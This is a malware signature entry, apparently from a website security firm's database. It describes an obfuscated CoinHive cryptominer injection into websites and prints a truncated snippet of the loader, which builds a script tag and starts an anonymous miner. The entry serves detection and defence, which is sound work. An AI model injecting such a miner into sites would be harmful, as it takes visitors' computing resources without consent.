Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.cryptominer.9

Description: One of many obfuscated CoinHive JavaScript miner injections, which usually means that it's used without webmaster's consent.

var _0x6477=[​"\x73\x63\x72​\x69\x70\x74","\x63\x72\x65\x61\x74\x65​\x45\x6C\x65\x6D\...skipped...\x69\x32\x57\x79\x54\x56​\x43\x51\x50\x63\x4C"];function require​(_0xf591x2​,_0xf591x3){var _0xf591x4=document[​_0x6477[1]](_0x6477[0])​;_0xf591x4[_0x6477[2]]= _0xf591x2;_0xf591x4[_0x6477[3]]= _0x6477[4];_0xf591x4[_0x6477[6]](_0x6477[5],_0xf591x3);document​[_0x6477[9]](_0x6477[8])[0][_0x6477[7]](_0xf591x4)}
require​(_0x6477[10],function(){ new CoinHive​.Anonymous(_0x6477[12])[_0x6477[11]]()})


Affecting: Any website. This code is usually found injected inside legitimate script tags.


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb